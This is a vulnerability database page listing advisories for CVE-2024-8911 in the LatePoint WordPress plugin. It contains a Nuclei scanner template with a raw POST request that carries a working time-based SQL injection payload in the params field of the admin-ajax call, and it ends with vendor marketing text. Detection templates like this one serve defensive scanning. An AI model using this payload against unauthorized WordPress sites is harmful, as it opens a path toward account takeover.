| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2024-8911 | 8 Oct 202412:02 | – | circl | |
| WordPress plugin LatePoint SQL注入漏洞 | 8 Oct 202400:00 | – | cnnvd | |
| CVE-2024-8911 | 8 Oct 202408:33 | – | cve | |
| CVE-2024-8911 LatePoint <= 5.0.11 - Unauthenticated Arbitrary User Password Change via SQL Injection | 8 Oct 202408:33 | – | cvelist | |
| EUVD-2024-49475 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-8911 | 8 Oct 202409:15 | – | nvd | |
| CVE-2024-8911 | 8 Oct 202409:15 | – | osv | |
| WordPress LatePoint plugin <= 5.0.11 - Unauthenticated Arbitrary User Password Change via SQL Injection vulnerability | 8 Oct 202403:00 | – | patchstack | |
| WordPress LatePoint Plugin <= 5.0.11 is vulnerable to SQL Injection | 8 Oct 202400:00 | – | patchstack | |
| PT-2024-39312 | 8 Oct 202400:00 | – | ptsecurity |
id: CVE-2024-8911
info:
name: LatePoint <= 5.0.11 - SQL Injection
author: daffainfo
severity: critical
description: |
The LatePoint plugin for WordPress is vulnerable to Arbitrary User Password Change via SQL Injection in versions up to, and including, 5.0.11. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts. Note that changing a WordPress user's password is only possible if the "Use WordPress users as customers" setting is enabled, which is disabled by default. Without this setting enabled, only the passwords of plugin customers, which are stored and managed in a separate database table, can be modified.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/5c9a23a3-5eb5-4f5b-bf32-c9d163426f29?source=cve
- https://www.wordfence.com/blog/2024/10/7000-wordpress-sites-affected-by-unauthenticated-critical-vulnerabilities-in-latepoint-wordpress-plugin/
- https://nvd.nist.gov/vuln/detail/CVE-2024-8911
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-8911
epss-score: 0.02823
epss-percentile: 0.8487
cwe-id: CWE-89
cpe: cpe:2.3:a:latepoint:latepoint:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: latepoint
product: latepoint
framework: wordpress
tags: cve,cve2024,wordpress,wp,wp-plugin,wp,vkev,intrusive,latepoint,sqli
flow: http(1) && http(2)
variables:
password: "{{rand_base(8)}}"
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "/wp-content/plugins/latepoint")'
condition: and
internal: true
- raw:
- |
@timeout: 30s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=latepoint_route_call&route_name=customer_cabinet__change_password¶ms=password_reset_token%5bOR%5d%5b%20IS%20NULL%20or%20not%20(select%20sleep(8)))%20limit%201%3b--%20-%5d%3d{{randstr}}%26password%3d{{randstr}}&return_format=json
matchers:
- type: dsl
dsl:
- 'duration >= 8'
- 'status_code == 200'
- 'contains(body, "\"status\":\"error\"")'
- 'contains(content_type, "application/json")'
condition: and
# digest: 490a0046304402206396465d10eb0797220d4adbc0dddf5842584347121882015cc03a319422448202206d03ba293bebd15268d1b7474a436a6ff7178be0c47a20048f967f9eddfb9b4c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation